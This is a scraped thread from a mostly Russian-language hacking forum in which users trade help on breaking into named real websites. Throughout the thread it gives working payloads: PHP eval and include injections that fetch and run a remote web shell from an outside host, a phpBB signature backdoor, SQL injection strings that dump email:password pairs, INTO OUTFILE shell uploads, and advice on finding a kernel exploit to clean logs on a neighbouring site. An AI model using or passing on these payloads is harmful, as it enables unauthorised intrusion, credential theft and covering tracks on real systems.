e=copy($_GET[shell],$_GET[save]);&shell=http://ссылка_до_шелла/shell.txt&save=/куда/сохранить/полный/путь/шелл.php

Faaax
19.12.2011, 17:03
547 said:
как сюда шелл залить?
http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;
у тебя тут похоже эррор бейсед


пробуй так

wget http://твой сайт.com/shell.php

или copy("http://твой сайт.com/shell.txt","/твой путь на машине/shell.php")

547
19.12.2011, 17:15
Expl0ited said:
e=copy($_GET[shell],$_GET[save]);&shell=http://ссылка_до_шелла/shell.txt&save=/куда/сохранить/полный/путь/шелл.php


не получиться:

Warning: copy(/var/www/faunaservis/fauna-servis.ua/forum/cache/xxx.php) [function.copy]: failed to open stream: Permission denied in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1

я уже что только не пробовал...

fopen,include,file_get_contents,copy.....

Expl0ited
19.12.2011, 17:17
547 said:
не получиться:
Warning: copy(/var/www/faunaservis/fauna-servis.ua/forum/cache/xxx.php) [function.copy]: failed to open stream: Permission denied in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1


В ошибке же ясно написано Permission denied, ищи директорию на которую хватит прав для записи.

547
19.12.2011, 17:20
Expl0ited said:
В ошибке же ясно написано Permission denied, ищи директорию на которую хватит прав для записи.


я понимаю, я уже перепробовал директории, не хватает прав, еще идеи будут?

Konqi
19.12.2011, 17:20
547 said:
я понимаю, я уже перепробовал директории, не хватает прав, еще идеи будут?


залей шелл в тмп и инклуди, если так хочется

547
19.12.2011, 17:30
Konqi said:
залей шелл в тмп и инклуди, если так хочется


хочется, но инклуд здесь не прокатит

Konqi
19.12.2011, 17:31
547 said:
хочется, но инклуд здесь не прокатит


что значит не прокатит?

разясните

copy('твой_шелл','/tmp/shell');

include('/tmp/shell'); //локальный инклуд

временно сможешь глянуть серв, пока сессия не устареет, а за это время успеешь найти вритабельную папку, или порутить серв если повезет

547
19.12.2011, 17:34
Konqi said:
что значит не прокатит?
разясните


залить в тмп получилось

потом пробую инклуд

http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=include%28%22/var/www/faunaservis/tmp/xxx.php%22%29;

выдает

Parse error: syntax error, unexpected $end in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1

может конечно я что то не то делаю, якобы синтаксис не тот...

к тому же директория темп не видна из инета...

Konqi
19.12.2011, 17:36
еще вариант eval-ить удаленно, eval(file_get_contents('шелл, без пхп тегов'));

+ посмотрите что там за ядро


к тому же директория темп не видна из инета...


=\ поэтому и инклудим, а не открываем шелл по прямому адресу

547
19.12.2011, 17:42
Konqi said:
еще вариант eval-ить удаленно, eval(file_get_contents('шелл, без пхп тегов'));
+ посмотрите что там за ядро
=\ поэтому и инклудим, а не открываем шелл по прямому адресу


ну да..

eval тоже юзал, file_get_contents, d первую очередь пробовал... но увы...

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:file_get_contents("http://.narod.ru/wso2.txt")' WHERE user_id=2;

выдало

Parse error: syntax error, unexpected $end in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code on line 1

Fatal error: preg_replace() [function.preg-replace]: Failed evaluating code: file_get_contents(\"http://.narod.ru/wso2.txt\&quot in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php on line 825

ядро

Linux nvh103 2.6.32-5-openvz-amd64 #1 SMP Mon Oct 3 05:12:50 UTC 2011 x86_64

там еще написано

This server is protected with the Suhosin Patch 0.9.6.2

подозреваю что не к добру это)

wkar
19.12.2011, 18:10
_http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&bb=eval(file_get_contents('http://la2evolution.com/w.txt'));

547
19.12.2011, 19:08
wkar said:
_http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&bb=eval(file_get_contents('http://la2evolution.com/w.txt'));


хочешь сказать что у тебя запустился шелл?

wkar
19.12.2011, 19:12
547 said:
хочешь сказать что у тебя запустился шелл?


Да, только чуть-чуть поправил


PHP:
UPDATE faunaservis.phpbb_users SET user_sig_bbc ode_uid='(.+)/e\0',user_sig='phpbb:eval(stripslashes($_REQUEST[bb]));'WHERE user_id=2;

PS

там даже папка на залив есть, шелл отправил в пм

lightangel
20.12.2011, 16:26
Is this website vulnerable?


Code:
http://www.aminfans.com/products.php?p_id=-2

Tried everything still, nothing works.

Expl0ited
20.12.2011, 17:12
lightangel said:
Is this website vulnerable?

Code:
http://www.aminfans.com/products.php?p_id=-2

Tried everything still, nothing works.


i don't think so

lightangel
20.12.2011, 18:14
Thanks.


Code:
http://www.barigo.de/shop/front/category_detail.php3?language=l2%27&cat_id=4%27&cat2_id=15%27&item_id=.24%27

Cannot get order by?

shell_c0de
20.12.2011, 19:10
2lightangel you yourself are not you ashamed? can all still try to read the manual about sql injections?

Expl0ited
20.12.2011, 19:10
lightangel said:
Thanks.

Code:
http://www.barigo.de/shop/front/category_detail.php3?language=l2%27&cat_id=4%27&cat2_id=15%27&item_id=.24%27

Cannot get order by?


/thread43966.html

Breetonia
21.12.2011, 03:44
Напал на след статьи /showthread.php?t=195037

Непонятен вопрос обхода пробелов через магические скобки ))) -


Code:
()

Запросы вида - /script.php?id=(50)union(select(1),database(),2--+) вводят в ступор.

Как это работает,там не объясняется.

trololoman96
21.12.2011, 07:52
Тут походу используются под запросы, подробней по ссылки ниже.

http://mysql.ru/docs/gruber/mg11.html

nikp
21.12.2011, 09:27
Breetonia said:
Напал на след статьи /showthread.php?t=195037
Непонятен вопрос обхода пробелов через магические скобки ))) -

Code:
()

Запросы вида - /script.php?id=(50)union(select(1),database(),2--+) вводят в ступор.
Как это работает,там не объясняется.


Скобки не магические, а круглые http://mysql.ru/docs/man/Parentheses.html

Просто в некоторых случаях, рядом со скобками (как и с некоторыми другими символами, пример && || @) пробел не обязателен.

qaz
21.12.2011, 14:20
хелп, немогу подобрать количество полей


PHP:
http://logan.ru/faq.html?id=12'+union+select+1,2,3,4,5,6,7,8,9,10, 12,13--+



есть ли какойеибуть софт который может ето сделать?? потомучто вручную подбирать срехнутя можно

wkar
21.12.2011, 14:30
2qaz,


Code:
http://logan.ru/faq.html?id=9999+union+select+1,group_concat(0x3a, version(),user(),3,4,5,6,7,8--+

/showpost.php?p=2789336&postcount=15 неплохой софт для автоматического проведения инъекции.

qaz
21.12.2011, 14:36
а вот, ещо вопрос, есть сайт

там вся инфа в таком виде

?????? ???? ????????? ???????????? ? ????? ??????? ??????????? ????????????? ?????? ????????. ????, ????????????? ?? ???? ????? ???

и естественно

из БД при sql-in тоже всё в таком виде, как быть? как в нормальном выде слить базу?

wkar
21.12.2011, 14:37
точно не знаю, но по моему это проблемы из-за кодировки, попробуй изменить кодировку страницы.

qaz
21.12.2011, 14:40
wkar said:
точно не знаю, но по моему это проблемы из-за кодировки, попробуй изменить кодировку страницы.


как?

wkar
21.12.2011, 14:44
В мозиле: Вид - Кодировка и попробуй каждую

qaz
21.12.2011, 15:02
wkar said:
В мозиле: Вид - Кодировка и попробуй каждую


а ну ладно, нужные мне данные в БД серовно на английском, они нормально отображаются

тут я столкнулся с другой проблемой, мне надо вывести данные вида маил:пасс

но я столкнулся с такой проблемой,

при такой конструкции concat_ws(0x3a,email,password)

выводит ошибку


PHP:
Illegal mix of collations(binary,COERCIBLE), ( latin1_swedish_ci,IMPLICIT), (cp1251_general_ci,I MPLICIT) foroperation'concat_ws'



как можно ещо попробовать вывести в нужном для меня виде?

er9j6@
21.12.2011, 15:05
qaz said:
а ну ладно, нужные мне данные в БД серовно на английском, они нормально отображаются
тут я столкнулся с другой проблемой, мне надо вывести данные вида маил:пасс
но я столкнулся с такой проблемой,
при такой конструкции concat_ws(0x3a,email,password)
выводит ошибку

PHP:
Illegal mix of collations(binary,COERCIBLE), ( latin1_swedish_ci,IMPLICIT), (cp1251_general_ci,I MPLICIT) foroperation'concat_ws'



как можно ещо попробовать вывести в нужном для меня виде?


unhex(hex(concat_ws(0x3a,email,password)))

qaz
21.12.2011, 15:10
er9j6@ said:
unhex(hex(concat_ws(0x3a,email,password)))


непомогло

er9j6@
21.12.2011, 15:19
qaz said:
непомогло


Нужен линк, так сложно определить в чем проблема

qaz
21.12.2011, 15:21
er9j6@ said:
Нужен линк, так сложно определить в чем проблема




PHP:
http://motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+unhe x(hex(concat_ws(0x3a,email,password)))+from+user+l imit+1,1),floor(rand(0)*2))having+min(0)+or+1--+

er9j6@
21.12.2011, 15:28
qaz said:

PHP:
http://motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+unhe x(hex(concat_ws(0x3a,email,password)))+from+user+l imit+1,1),floor(rand(0)*2))having+min(0)+or+1--+





Выводи пока так


http://motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+pass word+from+user+limit+10,1),floor(rand(0)*2))having +min(0)+or+1--+


и так еще можно:


http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+

qaz
21.12.2011, 15:45
er9j6@ said:
Выводи пока так
и так еще можно:



о, спасибо, а чё ето за чудо конструкция??

http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+

где я могу почитать о том что ето (@x:=0x 00) и тп, означает?

Napas
21.12.2011, 19:46
qaz said:
о, спасибо, а чё ето за чудо конструкция??
http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+
где я могу почитать о том что ето (@x:=0x 00) и тп, означает?


http://mysql.ru/docs/man/Variables.html

Cherep
21.12.2011, 19:58
вопрос технического характера, как отследить HTTPS запрос?

DarkMaster
21.12.2011, 20:47
Подскажите, здесь есть уязвимость, или только раскрытие путей:

saturn.net/contacts.php?id=4%27

уж больно пути странные пишет...

DeepBlue7
21.12.2011, 22:11
Подскажите... есть сайт, есть форма. Фильтр на иньекцию -


Code:
function is_secure($string)
{

//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
$pattern = "#[^A-Za-z0-9]#";

if(@preg_match($pattern,$string)==true) return false;
else
return true;
}


Если делаем так :


Code:


preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ?

Expl0ited
21.12.2011, 22:21
DeepBlue7 said:
Подскажите... есть сайт, есть форма. Фильтр на иньекцию -

Code:
function is_secure($string)
{

//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
$pattern = "#[^A-Za-z0-9]#";

if(@preg_match($pattern,$string)==true) return false;
else
return true;
}

Если делаем так :

Code:


preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ?


нельзя

er9j6@
21.12.2011, 23:01
DarkMaster said:
Подскажите, здесь есть уязвимость, или только раскрытие путей:
saturn.net/contacts.php?id=4%27
уж больно пути странные пишет...


Только раскрытие путей.

Но имеются другие уязвимые параметры и они говорят, что стоит база MSSQL , например:

http://saturn.net/news.php?id=430+order+by+datalength(@@version)+--+

http://saturn.net/news.php?id=convert(int,db_name()+COLLATE+SQL_Lati n1_General_Cp1254_CS_AS)+and+1=1

а, дальше вбиваешь этот url в havij и раскручиваешь да таблицы с паролем от админки

Count(name) of syscolumns Where id=(SELECT id FROM sysobjects WHERE name=char(119)%2bchar(95)%2bchar(83)%2bchar(105)%2 bchar(116)%2bchar(101)%2bchar(85)%2bchar(115)%2bch ar(101)%2bchar(114)) is 6

Column found: FullName

Column found: id

Column found: isEnabled

Column found: isSuperUser

Column found: Login

Column found: Password

shadowrun
22.12.2011, 11:24
http://www.kupibt.ru/catalogue/ID_19467

А эту как?

er9j6@
22.12.2011, 14:29
shadowrun said:
http://www.kupibt.ru/catalogue/ID_19467
А эту как?


А где ты тут скулю видишь?

Unknown
22.12.2011, 15:19
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.

stepashka_
22.12.2011, 15:22
alerondel said:
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.


Смотри версию ядра и ищи сплоит

boortyhuhtyu
22.12.2011, 15:28
alerondel said:
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.


/thread296327.html

namez2
23.12.2011, 00:35
подскажите как залить шел. если при залитии картинкой он переименовывается

Expl0ited
23.12.2011, 00:47
namez2 said:
подскажите как залить шел. если при залитии картинкой он переименовывается


как переименовывается? и как ты заливаешь?

что за cms?

namez2
23.12.2011, 00:56
видимо самописная. заливаю name.php.jpg пишет что залился но судя по всему уже получается newname.jpg и открываться не хотит...

Osstudio
23.12.2011, 00:58
namez2 said:
видимо самописная. заливаю name.php.jpg пишет что залился но судя по всему уже получается newname.jpg и открываться не хотит...


Через такую систему думаю никак, т.к она сама потом переименовывает независимо от того, какое название. Но, возможно, есть функция "переименовать" и т.п

snet
23.12.2011, 13:55
Не получается залить шел. Хотя путь к директории сайта знаю и привилегия на файл mysql пользователя YES. Может прав нет к папке www? как действовать?

Чакэ
23.12.2011, 14:01
snet said:
Не получается залить шел. Хотя путь к директории сайта знаю и привилегия на файл mysql пользователя YES. Может прав нет к папке www? как действовать?


для начала нужно показать нам как именно ты пытаешься это сделать.

snet
23.12.2011, 14:08
Чакэ said:
для начала нужно показать нам как именно ты пытаешься это сделать.


Через скуль инъекцию в пост запросе.


Code:
1' and (select 1 from(select count(*),concat((SELECT "" INTO OUTFILE "/адрес/файл.php"),floor(rand(0)*2 ))x from information_schema.tables group by x)a); --

Expl0ited
23.12.2011, 16:10
snet said:
Через скуль инъекцию в пост запросе.

Code:
1' and (select 1 from(select count(*),concat((SELECT "" INTO OUTFILE "/адрес/файл.php"),floor(rand(0)*2 ))x from information_schema.tables group by x)a); --



через еррор-бейсед нельзя залить шелл

lightangel
23.12.2011, 17:42
Code:
https://ventosavineyardscom.terrasite.com/cart.asp?Add=1+and%201=%28select%20top%201%20table _name%20from%20information.schema.tables%20where%2 0Table_name%20not%20in%20%28%27Events%27,%27schema %27,%27schema%27,%27schema%27,%27schema%27,%27sche ma%27,%27schema%27,%27schema%27,%27schema%27,%27sc hema%27,%27schema%27,%27schema%27,%27schema%27%29% 29

No admin table?

Always this error:


Code:
Incorrect syntax near the keyword 'schema'.

Only schema showing, why?

snet
23.12.2011, 17:46
Only schema showing, why?


no information.schema, information_schema must.

sorry for my english

KolosJey
23.12.2011, 18:00
через еррор-бейсед нельзя залить шелл



Вы наверное сейчас опять скажете что я не понял поста, ну да бог с ним

Ерор бейс это просто название, причём не самой скули, а варианта её эксплуатации .

А шелл залить можно везде где есть возможность сделать подзапрос (и даже без него). Просто навороты лишние ни к чему в запросе.

snet


1 and (select 1 into outfile '/путь/шелл.php' lines terminated by "")--

Expl0ited
23.12.2011, 18:03
KolosJey said:
Вы наверное сейчас опять скажете что я не понял поста, ну да бог с ним
Ерор бейс это просто название, причём не самой скули, а варианта её эксплуатации .
А шелл залить можно везде где есть возможность сделать подзапрос (и даже без него). Просто навороты лишние ни к чему в запросе.
snet




Code:
select user from mysql.user where 1 and (select 1 into outfile '/tmp/test.txt' lines terminated by "")--+

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile '/tmp/test.txt' lines terminated by "")--' at line 1

Не вводи в заблуждение пользователей, и прежде чем ответить на вопрос, будь добр протестируй это где-нибудь.

KolosJey
23.12.2011, 18:08
Expl0ited said:

Code:
select user from mysql.user where 1 and (select 1 into outfile '/tmp/test.txt' lines terminated by "")--+

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile '/tmp/test.txt' lines terminated by "")--' at line 1
Не вводи в заблуждение пользователей, и прежде чем ответить на вопрос, будь добр протестируй это где-нибудь.


Ну если МОА не видит что ошибка СИНТАКСИСА, тут я бессилен

Запрос рабочий, если всё сделать правильно

snet
23.12.2011, 18:09
Да все норм, вывела ошибка:


Code:
Can't create/write to file '/адрес/файл.php' (Errcode: 13)

Осталось найти папку где есть права.

Спасибо вам обоим.

lightangel, "Thank you" does not smudge on bread. Give me a plus for the reputation

lightangel
23.12.2011, 18:11
Thank you Snet, worked properly.

Expl0ited
23.12.2011, 18:21
Ух. В случае snet, всё элементарно, результат первого запроса, попадает во второй запрос, почему и невозможно раскрутить скуль обычным способом, и приходится использовать вывод в ошибке. Но для залития шелла, достаточно выполнить запрос:

SELECT column FROM table WHERE columns = false UNION SELECT 'test' INTO OUTFILE '/tmp/file.txt'

и при условии если директория доступна на запись для пользователя mysql, то первый запрос выполнится, файл успешно создастся.

Но в примере уважаемого пользователя KolosJey, ничего не получится, т.к. в данном подзапросе and (select 1 into outfile '/tmp/test.txt' lines terminated by "text") использование INTO OUTFILE нарушает синтаксис запроса, о чем и свидетельствует ошибка:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile

Ну если ОБЫЧНЫЕ ПОЛЬЗОВАТЕЛИ не научатся думать СВОЕЙ головой, тут я бессилен.

M_script
23.12.2011, 18:25
KolosJey said:
не самой скули, а варианта её эксплуатации.


Я бы даже сказал, варианта вывода на экран результата запроса. Если запрос направлен не на получение информации, а на внесение изменений (в файлы или базу), то без разницы, блайнд или нет.

Людям свойственно иногда ошибаться. Мы же не роботы.

"через еррор-бейсед нельзя залить шелл" (c) Expl0ited

snet
23.12.2011, 18:32
Спасибо что так суетитесь из-за моей проблемы

Действительно, вы оба правы. Можно было обычным способом отправить запрос:

union select 1,2,3,4,"blabla" into outfile "/asd", .

это 3 часовое ковыряние через error_base мне запудрило всю голову и я, почему-то, ограничил себя только им.

Но и вариант который привел КолосДжей тоже сработал. Записал его в свой справочник. Очень познавательно.

lightangel
23.12.2011, 20:09
Is there a way to inject this?


Code:
http://www.sheltonhitch.com/prodlist.asp?catId=1074%27%20having%201=1

Nothing is working for me.

Boolean
23.12.2011, 20:24
lightangel said:
Is there a way to inject this?

Code:
http://www.sheltonhitch.com/prodlist.asp?catId=1074%27%20having%201=1

Nothing is working for me.


Читай мануалы.

Konqi
23.12.2011, 20:30
lightangel

This is the last warning i'm giving to you, don't post basic injections, read tutorials and try to make it out by yourself or i'll just delete your posts

Groove
23.12.2011, 20:41
Я пользуюсь Navicat Premium для подключения к mysql как через эту прогу можно залить shell доступа в phpmyadmin нету только такой доступ .

Konqi
23.12.2011, 20:43
Groove said:
Я пользуюсь Navicat Premium для подключения к mysql как через эту прогу можно залить shell доступа в phpmyadmin нету только такой доступ .


не важно какой интерфейс доступа у вас, если есть File_priv и есть доступная папка на запись то залейте через select + into outfile

ne0k
23.12.2011, 23:48
Подскажите гуру,

Есть параметр *.php?search=mp3

Если вставить квадратные скобки: *.php?search[]= , то на странице появляется надпись "array".

В следствии чего возникает такая ошибка, и можно ли как-то эксплуатировать?

Заранее спасибо за пояснительный ответ.

Чакэ
23.12.2011, 23:52
ne0k said:
Подскажите гуру,
Есть параметр *.php?search=mp3
Если вставить квадратные скобки: *.php?search[]= , то на странице появляется надпись "array".
В следствии чего возникает такая ошибка, и можно ли как-то эксплуатировать?
Заранее спасибо за пояснительный ответ.


безобидный нотис.

Konqi
23.12.2011, 23:54
ne0k said:
Подскажите гуру,
Есть параметр *.php?search=mp3
Если вставить квадратные скобки: *.php?search[]= , то на странице появляется надпись "array".
В следствии чего возникает такая ошибка, и можно ли как-то эксплуатировать?
Заранее спасибо за пояснительный ответ.


если показ ошибок не выключено то получишь раскрытие путей и больше ничего - пока не знаешь какие функции используются на серверной части

Expl0ited
23.12.2011, 23:55
ne0k said:
Подскажите гуру,
Есть параметр *.php?search=mp3
Если вставить квадратные скобки: *.php?search[]= , то на странице появляется надпись "array".
В следствии чего возникает такая ошибка, и можно ли как-то эксплуатировать?
Заранее спасибо за пояснительный ответ.


Это возникает в следствии того, что в переменной _GET['search'] ты передаешь массив, такое поведение никак не запланировано в коде, и эта переменная начинает обрабатывается как обычная строковая переменная, а не как массив, в конце концов значение переменной выводит на экран, по этому и появляется "Array". Использовать это в данном случае, ты никак не сможешь.

Vladislav88
25.12.2011, 06:32
На каких сайтах можно попробовать xss и чтобы потом у меня проблем небыло? Я новичок просто. Я заходил в гугл , писал слово чат , находил разные чаты и там где я вижу галимый сайт , по левому построен там можно пробовать , на этих сайтах можно тренироваться и не будет у меня потом проблем?

Expl0ited
25.12.2011, 07:45
Vladislav88 said:
На каких сайтах можно попробовать xss и чтобы потом у меня проблем небыло? Я новичок просто. Я заходил в гугл , писал слово чат , находил разные чаты и там где я вижу галимый сайт , по левому построен там можно пробовать , на этих сайтах можно тренироваться и не будет у меня потом проблем?


Конечно будут! Безопасно, если ты развернешь сайт у себя на компе и будешь тренироваться на нем!